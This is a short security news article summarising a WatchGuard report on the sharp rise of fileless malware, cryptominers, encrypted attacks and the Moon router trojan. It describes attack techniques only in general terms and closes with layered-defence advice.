According to a recent survey, the usage of fileless malware skyrocketed last year as hackers explore innovative steps to bypass the conventional security controls.
According to a study from Watchguard Technologies, the use of fileless malware grew rapidly last year as hackers sought new ways to circumvent conventional security controls. Data from Firebox Feed, threat intelligence, and a study honeynet were used to compile the report.
Attackers are said to have used toolkits like PowerSploit and CobaltStrike to insert malicious code into running processes so that they could continue to run even though the original script was detected and removed. Other information in this study included the return of an IoT or consumer router trojan known as the Moon, the use of cryptominers, and the top malicious domains. For the first time, the Moon trojan has made it into WatchGuard’s top 10 malware list.
About Fileless Malware
A fileless malware attack based on PowerShell uses PowerShell’s native capabilities to attack the victim. One of the PowerShell cmdlets that is best suited to such an attack is the Invoke-Command cmdlet. This cmdlet is used to run a PowerShell command
Fileless malware uses covert attacks to hijack legitimate programs, avoiding detection by most security solutions. Since it doesn’t use archives and leaves no trace, fileless malware is difficult to detect and frustrates even the most experienced forensic analysts.
In order to escape checks that prevent malformed inputs, a fileless attack uses a carefully designed string of instructions known as the payload i.e. Base-64 encoded. This payload can delivered to the target host in a number of ways, including through a website’s input field, a connection, a packet sent over a network protocol (TCP/IP, HTTP, WebRTC, RTP, DNS, and so on), or a script embedded in a file.
Some Statistics
According to the study, the rate of fileless malware increased by 888 percent year over year as hackers attempted to avoid endpoint security by launching cyber attacks without using traditional malware. In Q4, nearly 47% of all the cyber attacks were encrypted, with malware delivered via HTTPS increasing by 41% and encrypted zero-day variants increasing by 22% over Q3.
Despite the widespread adoption of remote working, network attack detections increased by 5% in the fourth quarter, hitting their highest level in two years. In comparison to Q3, the total number of specific attack signatures increased by 4%. Furthermore, in 2020, the vendor saw 25% more cryptocurrency mining malware than in 2019.
As more workers operate from home, overall perimeter-detected malware decreased by 4% quarter over quarter. Year over year, the number of unique cryptominer variants increased by more than 25%, reaching 850 in 2020.
DNSWatch blocked a total of 1,313,686 malicious domain connections in Q4. Attacks on Asia-Pacific networks decreased by 16 points, while attacks in AMER and EMEA increased by nearly the same amount.
Concluding Words
Cybercriminals’ use of advanced, evasive threat techniques has increased in the last year, highlighting the value of layered, end-to-end security defences. Organizations now need an overall successful security policy that includes endpoint safeguards, network defences, security awareness training, threat intelligence, and strict patch management to defend against such threats.